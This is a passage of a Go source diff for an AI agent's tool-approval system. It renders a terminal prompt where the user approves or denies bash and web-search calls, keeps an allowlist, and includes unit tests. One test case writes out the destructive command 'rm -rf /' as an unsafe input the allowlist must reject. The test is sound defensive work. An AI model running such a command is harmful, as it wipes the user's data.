return ApprovalResult{Decision: ApprovalAlways}, nil
|
||||||
|
default:
|
||||||
|
return ApprovalResult{Decision: ApprovalDeny, DenyReason: denyReason}, nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// formatToolDisplay creates the display string for a tool call.
|
||||||
|
func formatToolDisplay(toolName string, args map[string]any) string {
|
||||||
|
var sb strings.Builder
|
||||||
|
|
||||||
|
// For bash, show command directly
|
||||||
|
if toolName == "bash" {
|
||||||
|
if cmd, ok := args["command"].(string); ok {
|
||||||
|
sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName))
|
||||||
|
sb.WriteString(fmt.Sprintf("Command: %s", cmd))
|
||||||
|
return sb.String()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// For web search, show query
|
||||||
|
if toolName == "web_search" {
|
||||||
|
if query, ok := args["query"].(string); ok {
|
||||||
|
sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName))
|
||||||
|
sb.WriteString(fmt.Sprintf("Query: %s", query))
|
||||||
|
return sb.String()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Generic display
|
||||||
|
sb.WriteString(fmt.Sprintf("Tool: %s", toolName))
|
||||||
|
if len(args) > 0 {
|
||||||
|
sb.WriteString("\nArguments: ")
|
||||||
|
first := true
|
||||||
|
for k, v := range args {
|
||||||
|
if !first {
|
||||||
|
sb.WriteString(", ")
|
||||||
|
}
|
||||||
|
sb.WriteString(fmt.Sprintf("%s=%v", k, v))
|
||||||
|
first = false
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return sb.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
// selectorState holds the state for the interactive selector
|
||||||
|
type selectorState struct {
|
||||||
|
toolDisplay string
|
||||||
|
selected int
|
||||||
|
totalLines int
|
||||||
|
termWidth int
|
||||||
|
termHeight int
|
||||||
|
boxWidth int
|
||||||
|
innerWidth int
|
||||||
|
denyReason string // deny reason (always visible in box)
|
||||||
|
isWarning bool // true if command targets paths outside cwd (red box)
|
||||||
|
}
|
||||||
|
|
||||||
|
// runSelector runs the interactive selector and returns the selected index and optional deny reason.
|
||||||
|
// If isWarning is true, the box is rendered in red to indicate the command targets paths outside cwd.
|
||||||
|
func runSelector(fd int, oldState *term.State, toolDisplay string, isWarning bool) (int, string, error) {
|
||||||
|
state := &selectorState{
|
||||||
|
toolDisplay: toolDisplay,
|
||||||
|
selected: 0,
|
||||||
|
isWarning: isWarning,
|
||||||
|
}
|
||||||
|
|
||||||
|
// Get terminal size
|
||||||
|
state.termWidth, state.termHeight, _ = term.GetSize(fd)
|
||||||
|
if state.termWidth < 20 {
|
||||||
|
state.termWidth = 80 // fallback
|
||||||
|
}
|
||||||
|
|
||||||
|
// Calculate box width: 90% of terminal, min 24, max 60
|
||||||
|
state.boxWidth = (state.termWidth * 90) / 100
|
||||||
|
if state.boxWidth > 60 {
|
||||||
|
state.boxWidth = 60
|
||||||
|
}
|
||||||
|
if state.boxWidth < 24 {
|
||||||
|
state.boxWidth = 24
|
||||||
|
}
|
||||||
|
// Ensure box fits in terminal
|
||||||
|
if state.boxWidth > state.termWidth-1 {
|
||||||
|
state.boxWidth = state.termWidth - 1
|
||||||
|
}
|
||||||
|
state.innerWidth = state.boxWidth - 4 // account for "│ " and " │"
|
||||||
|
|
||||||
|
// Calculate total lines (will be updated by render)
|
||||||
|
state.totalLines = calculateTotalLines(state)
|
||||||
|
|
||||||
|
// Hide cursor during selection (show when in deny mode)
|
||||||
|
fmt.Fprint(os.Stderr, "\033[?25l")
|
||||||
|
defer fmt.Fprint(os.Stderr, "\033[?25h") // Show cursor when done
|
||||||
|
|
||||||
|
// Initial render
|
||||||
|
renderSelectorBox(state)
|
||||||
|
|
||||||
|
numOptions := len(optionLabels)
|
||||||
|
|
||||||
|
for {
|
||||||
|
// Read input
|
||||||
|
buf := make([]byte, 8)
|
||||||
|
n, err := os.Stdin.Read(buf)
|
||||||
|
if err != nil {
|
||||||
|
clearSelectorBox(state)
|
||||||
|
return 2, "", err
|
||||||
|
}
|
||||||
|
|
||||||
|
// Process input byte by byte
|
||||||
|
for i := 0; i < n; i++ {
|
||||||
|
ch := buf[i]
|
||||||
|
|
||||||
|
// Check for escape sequences (arrow keys)
|
||||||
|
if ch == 27 && i+2 < n && buf[i+1] == '[' {
|
||||||
|
oldSelected := state.selected
|
||||||
|
switch buf[i+2] {
|
||||||
|
case 'A': // Up arrow
|
||||||
|
if state.selected > 0 {
|
||||||
|
state.selected--
|
||||||
|
}
|
||||||
|
case 'B': // Down arrow
|
||||||
|
if state.selected < numOptions-1 {
|
||||||
|
state.selected++
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if oldSelected != state.selected {
|
||||||
|
updateSelectorOptions(state)
|
||||||
|
}
|
||||||
|
i += 2 // Skip the rest of escape sequence
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
switch {
|
||||||
|
// Ctrl+C - cancel
|
||||||
|
case ch == 3:
|
||||||
|
clearSelectorBox(state)
|
||||||
|
return -1, "", nil // -1 indicates cancelled
|
||||||
|
|
||||||
|
// Enter key - confirm selection
|
||||||
|
case ch == 13:
|
||||||
|
clearSelectorBox(state)
|
||||||
|
if state.selected == 2 { // Deny
|
||||||
|
return 2, state.denyReason, nil
|
||||||
|
}
|
||||||
|
return state.selected, "", nil
|
||||||
|
|
||||||
|
// Number keys 1-3 for quick select
|
||||||
|
case ch >= '1' && ch <= '3':
|
||||||
|
selected := int(ch - '1')
|
||||||
|
clearSelectorBox(state)
|
||||||
|
if selected == 2 { // Deny
|
||||||
|
return 2, state.denyReason, nil
|
||||||
|
}
|
||||||
|
return selected, "", nil
|
||||||
|
|
||||||
|
// Backspace - delete from reason (UTF-8 safe)
|
||||||
|
case ch == 127 || ch == 8:
|
||||||
|
if len(state.denyReason) > 0 {
|
||||||
|
runes := []rune(state.denyReason)
|
||||||
|
state.denyReason = string(runes[:len(runes)-1])
|
||||||
|
updateReasonInput(state)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Escape - clear reason
|
||||||
|
case ch == 27:
|
||||||
|
if len(state.denyReason) > 0 {
|
||||||
|
state.denyReason = ""
|
||||||
|
updateReasonInput(state)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Printable ASCII (except 1-3 handled above) - type into reason
|
||||||
|
case ch >= 32 && ch < 127:
|
||||||
|
maxLen := state.innerWidth - 2
|
||||||
|
if maxLen < 10 {
|
||||||
|
maxLen = 10
|
||||||
|
}
|
||||||
|
if len(state.denyReason) < maxLen {
|
||||||
|
state.denyReason += string(ch)
|
||||||
|
// Auto-select Deny option when user starts typing
|
||||||
|
if state.selected != 2 {
|
||||||
|
state.selected = 2
|
||||||
|
updateSelectorOptions(state)
|
||||||
|
} else {
|
||||||
|
updateReasonInput(state)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// wrapText wraps text to fit within maxWidth, returning lines
|
||||||
|
func wrapText(text string, maxWidth int) []string {
|
||||||
|
if maxWidth < 5 {
|
||||||
|
maxWidth = 5
|
||||||
|
}
|
||||||
|
var lines []string
|
||||||
|
for _, line := range strings.Split(text, "\n") {
|
||||||
|
if len(line) <= maxWidth {
|
||||||
|
lines = append(lines, line)
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
// Wrap long lines
|
||||||
|
for len(line) > maxWidth {
|
||||||
|
// Try to break at space
|
||||||
|
breakAt := maxWidth
|
||||||
|
for i := maxWidth; i > maxWidth/2; i-- {
|
||||||
|
if i < len(line) && line[i] == ' ' {
|
||||||
|
breakAt = i
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
lines = append(lines, line[:breakAt])
|
||||||
|
line = strings.TrimLeft(line[breakAt:], " ")
|
||||||
|
}
|
||||||
|
if len(line) > 0 {
|
||||||
|
lines = append(lines, line)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return lines
|
||||||
|
}
|
||||||
|
|
||||||
|
// getHintLines returns the hint text wrapped to terminal width
|
||||||
|
func getHintLines(state *selectorState) []string {
|
||||||
|
hint := "↑/↓ navigate, Enter confirm, 1-3 quick, Ctrl+C cancel"
|
||||||
|
if state.termWidth >= len(hint)+1 {
|
||||||
|
return []string{hint}
|
||||||
|
}
|
||||||
|
// Wrap hint to multiple lines
|
||||||
|
return wrapText(hint, state.termWidth-1)
|
||||||
|
}
|
||||||
|
|
||||||
|
// calculateTotalLines calculates how many lines the selector will use
|
||||||
|
func calculateTotalLines(state *selectorState) int {
|
||||||
|
toolLines := wrapText(state.toolDisplay, state.innerWidth)
|
||||||
|
hintLines := getHintLines(state)
|
||||||
|
// top border + (warning line if applicable) + tool lines + separator + options + bottom border + hint lines
|
||||||
|
warningLines := 0
|
||||||
|
if state.isWarning {
|
||||||
|
warningLines = 1
|
||||||
|
}
|
||||||
|
return 1 + warningLines + len(toolLines) + 1 + len(optionLabels) + 1 + len(hintLines)
|
||||||
|
}
|
||||||
|
|
||||||
|
// renderSelectorBox renders the complete selector box
|
||||||
|
func renderSelectorBox(state *selectorState) {
|
||||||
|
toolLines := wrapText(state.toolDisplay, state.innerWidth)
|
||||||
|
hintLines := getHintLines(state)
|
||||||
|
|
||||||
|
// Use red for warning (outside cwd), cyan for normal
|
||||||
|
boxColor := "\033[36m" // cyan
|
||||||
|
if state.isWarning {
|
||||||
|
boxColor = "\033[91m" // bright red
|
||||||
|
}
|
||||||
|
|
||||||
|
// Draw box top
|
||||||
|
fmt.Fprintf(os.Stderr, "%s┌%s┐\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||||
|
|
||||||
|
// Draw warning line if needed (inside the box)
|
||||||
|
if state.isWarning {
|
||||||
|
warning := "!! OUTSIDE PROJECT !!"
|
||||||
|
padding := (state.innerWidth - len(warning)) / 2
|
||||||
|
if padding < 0 {
|
||||||
|
padding = 0
|
||||||
|
}
|
||||||
|
fmt.Fprintf(os.Stderr, "%s│\033[0m %s%s%s %s│\033[0m\033[K\r\n", boxColor,
|
||||||
|
strings.Repeat(" ", padding), warning, strings.Repeat(" ", state.innerWidth-len(warning)-padding), boxColor)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Draw tool info
|
||||||
|
for _, line := range toolLines {
|
||||||
|
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth, line, boxColor)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Draw separator
|
||||||
|
fmt.Fprintf(os.Stderr, "%s├%s┤\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||||
|
|
||||||
|
// Draw options with numbers (Deny option includes reason input)
|
||||||
|
for i, label := range optionLabels {
|
||||||
|
if i == 2 { // Deny option - show with reason input beside it
|
||||||
|
denyLabel := "3. Deny: "
|
||||||
|
availableWidth := state.innerWidth - 2 - len(denyLabel)
|
||||||
|
if availableWidth < 5 {
|
||||||
|
availableWidth = 5
|
||||||
|
}
|
||||||
|
inputDisplay := state.denyReason
|
||||||
|
if len(inputDisplay) > availableWidth {
|
||||||
|
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
|
||||||
|
}
|
||||||
|
if i == state.selected {
|
||||||
|
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||||
|
} else {
|
||||||
|
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
displayLabel := label
|
||||||
|
if len(displayLabel) > state.innerWidth-2 {
|
||||||
|
displayLabel = displayLabel[:state.innerWidth-5] + "..."
|
||||||
|
}
|
||||||
|
if i == state.selected {
|
||||||
|
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
|
||||||
|
} else {
|
||||||
|
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Draw box bottom
|
||||||
|
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||||
|
|
||||||
|
// Draw hint (may be multiple lines)
|
||||||
|
for i, line := range hintLines {
|
||||||
|
if i == len(hintLines)-1 {
|
||||||
|
// Last line - no newline
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
|
||||||
|
} else {
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// updateSelectorOptions updates just the options portion of the selector
|
||||||
|
func updateSelectorOptions(state *selectorState) {
|
||||||
|
hintLines := getHintLines(state)
|
||||||
|
|
||||||
|
// Use red for warning (outside cwd), cyan for normal
|
||||||
|
boxColor := "\033[36m" // cyan
|
||||||
|
if state.isWarning {
|
||||||
|
boxColor = "\033[91m" // bright red
|
||||||
|
}
|
||||||
|
|
||||||
|
// Move up to the first option line
|
||||||
|
// Cursor is at end of last hint line, need to go up:
|
||||||
|
// (hint lines - 1) + 1 (bottom border) + numOptions
|
||||||
|
linesToMove := len(hintLines) - 1 + 1 + len(optionLabels)
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
|
||||||
|
|
||||||
|
// Redraw options (Deny option includes reason input)
|
||||||
|
for i, label := range optionLabels {
|
||||||
|
if i == 2 { // Deny option
|
||||||
|
denyLabel := "3. Deny: "
|
||||||
|
availableWidth := state.innerWidth - 2 - len(denyLabel)
|
||||||
|
if availableWidth < 5 {
|
||||||
|
availableWidth = 5
|
||||||
|
}
|
||||||
|
inputDisplay := state.denyReason
|
||||||
|
if len(inputDisplay) > availableWidth {
|
||||||
|
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
|
||||||
|
}
|
||||||
|
if i == state.selected {
|
||||||
|
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||||
|
} else {
|
||||||
|
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
displayLabel := label
|
||||||
|
if len(displayLabel) > state.innerWidth-2 {
|
||||||
|
displayLabel = displayLabel[:state.innerWidth-5] + "..."
|
||||||
|
}
|
||||||
|
if i == state.selected {
|
||||||
|
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
|
||||||
|
} else {
|
||||||
|
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Redraw bottom and hint
|
||||||
|
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||||
|
for i, line := range hintLines {
|
||||||
|
if i == len(hintLines)-1 {
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
|
||||||
|
} else {
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// updateReasonInput updates just the Deny option line (which contains the reason input)
|
||||||
|
func updateReasonInput(state *selectorState) {
|
||||||
|
hintLines := getHintLines(state)
|
||||||
|
|
||||||
|
// Use red for warning (outside cwd), cyan for normal
|
||||||
|
boxColor := "\033[36m" // cyan
|
||||||
|
if state.isWarning {
|
||||||
|
boxColor = "\033[91m" // bright red
|
||||||
|
}
|
||||||
|
|
||||||
|
// Move up to the Deny line (3rd option, index 2)
|
||||||
|
// Cursor is at end of last hint line, need to go up:
|
||||||
|
// (hint lines - 1) + 1 (bottom border) + 1 (Deny is last option)
|
||||||
|
linesToMove := len(hintLines) - 1 + 1 + 1
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
|
||||||
|
|
||||||
|
// Redraw Deny line with reason
|
||||||
|
denyLabel := "3. Deny: "
|
||||||
|
availableWidth := state.innerWidth - 2 - len(denyLabel)
|
||||||
|
if availableWidth < 5 {
|
||||||
|
availableWidth = 5
|
||||||
|
}
|
||||||
|
inputDisplay := state.denyReason
|
||||||
|
if len(inputDisplay) > availableWidth {
|
||||||
|
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
|
||||||
|
}
|
||||||
|
if state.selected == 2 {
|
||||||
|
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||||
|
} else {
|
||||||
|
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Redraw bottom and hint
|
||||||
|
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||||
|
for i, line := range hintLines {
|
||||||
|
if i == len(hintLines)-1 {
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
|
||||||
|
} else {
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// clearSelectorBox clears the selector from screen
|
||||||
|
func clearSelectorBox(state *selectorState) {
|
||||||
|
// Clear the current line (hint line) first
|
||||||
|
fmt.Fprint(os.Stderr, "\r\033[K")
|
||||||
|
// Move up and clear each remaining line
|
||||||
|
for range state.totalLines - 1 {
|
||||||
|
fmt.Fprint(os.Stderr, "\033[A\033[K")
|
||||||
|
}
|
||||||
|
fmt.Fprint(os.Stderr, "\r")
|
||||||
|
}
|
||||||
|
|
||||||
|
// fallbackApproval handles approval when terminal control isn't available.
|
||||||
|
func (a *ApprovalManager) fallbackApproval(toolDisplay string) (ApprovalResult, error) {
|
||||||
|
fmt.Fprintln(os.Stderr)
|
||||||
|
fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
|
||||||
|
fmt.Fprintln(os.Stderr, toolDisplay)
|
||||||
|
fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
|
||||||
|
fmt.Fprintln(os.Stderr, "[1] Execute once [2] Always allow [3] Deny")
|
||||||
|
fmt.Fprint(os.Stderr, "Choice: ")
|
||||||
|
|
||||||
|
var input string
|
||||||
|
fmt.Scanln(&input)
|
||||||
|
|
||||||
|
switch input {
|
||||||
|
case "1":
|
||||||
|
return ApprovalResult{Decision: ApprovalOnce}, nil
|
||||||
|
case "2":
|
||||||
|
return ApprovalResult{Decision: ApprovalAlways}, nil
|
||||||
|
default:
|
||||||
|
fmt.Fprint(os.Stderr, "Reason (optional): ")
|
||||||
|
var reason string
|
||||||
|
fmt.Scanln(&reason)
|
||||||
|
return ApprovalResult{Decision: ApprovalDeny, DenyReason: reason}, nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Reset clears the session allowlist.
|
||||||
|
func (a *ApprovalManager) Reset() {
|
||||||
|
a.mu.Lock()
|
||||||
|
defer a.mu.Unlock()
|
||||||
|
a.allowlist = make(map[string]bool)
|
||||||
|
a.prefixes = make(map[string]bool)
|
||||||
|
}
|
||||||
|
|
||||||
|
// AllowedTools returns a list of tools and prefixes in the allowlist.
|
||||||
|
func (a *ApprovalManager) AllowedTools() []string {
|
||||||
|
a.mu.RLock()
|
||||||
|
defer a.mu.RUnlock()
|
||||||
|
|
||||||
|
tools := make([]string, 0, len(a.allowlist)+len(a.prefixes))
|
||||||
|
for tool := range a.allowlist {
|
||||||
|
tools = append(tools, tool)
|
||||||
|
}
|
||||||
|
for prefix := range a.prefixes {
|
||||||
|
tools = append(tools, prefix+"*")
|
||||||
|
}
|
||||||
|
return tools
|
||||||
|
}
|
||||||
|
|
||||||
|
// FormatApprovalResult returns a formatted string showing the approval result.
|
||||||
|
func FormatApprovalResult(toolName string, args map[string]any, result ApprovalResult) string {
|
||||||
|
var status string
|
||||||
|
var icon string
|
||||||
|
|
||||||
|
switch result.Decision {
|
||||||
|
case ApprovalOnce:
|
||||||
|
status = "Approved"
|
||||||
|
icon = "\033[32m✓\033[0m"
|
||||||
|
case ApprovalAlways:
|
||||||
|
status = "Always allowed"
|
||||||
|
icon = "\033[32m✓\033[0m"
|
||||||
|
case ApprovalDeny:
|
||||||
|
status = "Denied"
|
||||||
|
icon = "\033[31m✗\033[0m"
|
||||||
|
}
|
||||||
|
|
||||||
|
// Format based on tool type
|
||||||
|
if toolName == "bash" {
|
||||||
|
if cmd, ok := args["command"].(string); ok {
|
||||||
|
// Truncate long commands
|
||||||
|
if len(cmd) > 40 {
|
||||||
|
cmd = cmd[:37] + "..."
|
||||||
|
}
|
||||||
|
return fmt.Sprintf("▶ bash: %s [%s] %s", cmd, status, icon)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if toolName == "web_search" {
|
||||||
|
if query, ok := args["query"].(string); ok {
|
||||||
|
// Truncate long queries
|
||||||
|
if len(query) > 40 {
|
||||||
|
query = query[:37] + "..."
|
||||||
|
}
|
||||||
|
return fmt.Sprintf("▶ web_search: %s [%s] %s", query, status, icon)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return fmt.Sprintf("▶ %s [%s] %s", toolName, status, icon)
|
||||||
|
}
|
||||||
|
|
||||||
|
// FormatDenyResult returns the tool result message when a tool is denied.
|
||||||
|
func FormatDenyResult(toolName string, reason string) string {
|
||||||
|
if reason != "" {
|
||||||
|
return fmt.Sprintf("User denied execution of %s. Reason: %s", toolName, reason)
|
||||||
|
}
|
||||||
|
return fmt.Sprintf("User denied execution of %s.", toolName)
|
||||||
|
}
|
||||||
|
|
@ -0,0 +1,379 @@
|
||||||
|
package agent
|
||||||
|
|
||||||
|
import (
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestApprovalManager_IsAllowed(t *testing.T) {
|
||||||
|
am := NewApprovalManager()
|
||||||
|
|
||||||
|
// Initially nothing is allowed
|
||||||
|
if am.IsAllowed("test_tool", nil) {
|
||||||
|
t.Error("expected test_tool to not be allowed initially")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Add to allowlist
|
||||||
|
am.AddToAllowlist("test_tool", nil)
|
||||||
|
|
||||||
|
// Now it should be allowed
|
||||||
|
if !am.IsAllowed("test_tool", nil) {
|
||||||
|
t.Error("expected test_tool to be allowed after AddToAllowlist")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Other tools should still not be allowed
|
||||||
|
if am.IsAllowed("other_tool", nil) {
|
||||||
|
t.Error("expected other_tool to not be allowed")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestApprovalManager_Reset(t *testing.T) {
|
||||||
|
am := NewApprovalManager()
|
||||||
|
|
||||||
|
am.AddToAllowlist("tool1", nil)
|
||||||
|
am.AddToAllowlist("tool2", nil)
|
||||||
|
|
||||||
|
if !am.IsAllowed("tool1", nil) || !am.IsAllowed("tool2", nil) {
|
||||||
|
t.Error("expected tools to be allowed")
|
||||||
|
}
|
||||||
|
|
||||||
|
am.Reset()
|
||||||
|
|
||||||
|
if am.IsAllowed("tool1", nil) || am.IsAllowed("tool2", nil) {
|
||||||
|
t.Error("expected tools to not be allowed after Reset")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestApprovalManager_AllowedTools(t *testing.T) {
|
||||||
|
am := NewApprovalManager()
|
||||||
|
|
||||||
|
tools := am.AllowedTools()
|
||||||
|
if len(tools) != 0 {
|
||||||
|
t.Errorf("expected 0 allowed tools, got %d", len(tools))
|
||||||
|
}
|
||||||
|
|
||||||
|
am.AddToAllowlist("tool1", nil)
|
||||||
|
am.AddToAllowlist("tool2", nil)
|
||||||
|
|
||||||
|
tools = am.AllowedTools()
|
||||||
|
if len(tools) != 2 {
|
||||||
|
t.Errorf("expected 2 allowed tools, got %d", len(tools))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestAllowlistKey(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
name string
|
||||||
|
toolName string
|
||||||
|
args map[string]any
|
||||||
|
expected string
|
||||||
|
}{
|
||||||
|
{
|
||||||
|
name: "web_search tool",
|
||||||
|
toolName: "web_search",
|
||||||
|
args: map[string]any{"query": "test"},
|
||||||
|
expected: "web_search",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "bash tool with command",
|
||||||
|
toolName: "bash",
|
||||||
|
args: map[string]any{"command": "ls -la"},
|
||||||
|
expected: "bash:ls -la",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "bash tool without command",
|
||||||
|
toolName: "bash",
|
||||||
|
args: map[string]any{},
|
||||||
|
expected: "bash",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "other tool",
|
||||||
|
toolName: "custom_tool",
|
||||||
|
args: map[string]any{"param": "value"},
|
||||||
|
expected: "custom_tool",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, tt := range tests {
|
||||||
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
|
result := AllowlistKey(tt.toolName, tt.args)
|
||||||
|
if result != tt.expected {
|
||||||
|
t.Errorf("AllowlistKey(%s, %v) = %s, expected %s",
|
||||||
|
tt.toolName, tt.args, result, tt.expected)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestExtractBashPrefix(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
name string
|
||||||
|
command string
|
||||||
|
expected string
|
||||||
|
}{
|
||||||
|
{
|
||||||
|
name: "cat with path",
|
||||||
|
command: "cat tools/tools_test.go",
|
||||||
|
expected: "cat:tools/",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "cat with pipe",
|
||||||
|
command: "cat tools/tools_test.go | head -200",
|
||||||
|
expected: "cat:tools/",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "ls with path",
|
||||||
|
command: "ls -la src/components",
|
||||||
|
expected: "ls:src/",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "grep with directory path",
|
||||||
|
command: "grep -r pattern api/handlers/",
|
||||||
|
expected: "grep:api/handlers/",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "cat in current dir",
|
||||||
|
command: "cat file.txt",
|
||||||
|
expected: "cat:./",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "unsafe command",
|
||||||
|
command: "rm -rf /",
|
||||||
|
expected: "",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "no path arg",
|
||||||
|
command: "ls -la",
|
||||||
|
expected: "",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "head with flags only",
|
||||||
|
command: "head -n 100",
|
||||||
|
expected: "",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, tt := range tests {
|
||||||
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
|
result := extractBashPrefix(tt.command)
|
||||||
|
if result != tt.expected {
|
||||||
|
t.Errorf("extractBashPrefix(%q) = %q, expected %q",
|
||||||
|
tt.command, result, tt.expected)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestApprovalManager_PrefixAllowlist(t *testing.T) {
|
||||||
|
am := NewApprovalManager()
|
||||||
|
|
||||||
|
// Allow "cat tools/file.go"
|
||||||
|
am.AddToAllowlist("bash", map[string]any{"command": "cat tools/file.go"})
|
||||||
|
|
||||||
|
// Should allow other files in same directory
|
||||||
|
if !am.IsAllowed("bash", map[string]any{"command": "cat tools/other.go"}) {
|
||||||
|
t.Error("expected cat tools/other.go to be allowed via prefix")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should not allow different directory
|
||||||
|
if am.IsAllowed("bash", map[string]any{"command": "cat src/main.go"}) {
|
||||||
|
t.Error("expected cat src/main.go to NOT be allowed")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should not allow different command in same directory
|
||||||
|
if am.IsAllowed("bash", map[string]any{"command": "rm tools/file.go"}) {
|
||||||
|
t.Error("expected rm tools/file.go to NOT be allowed (rm is not a safe command)")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFormatApprovalResult(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
name string
|
||||||
|
toolName string
|
||||||
|
args map[string]any
|
||||||
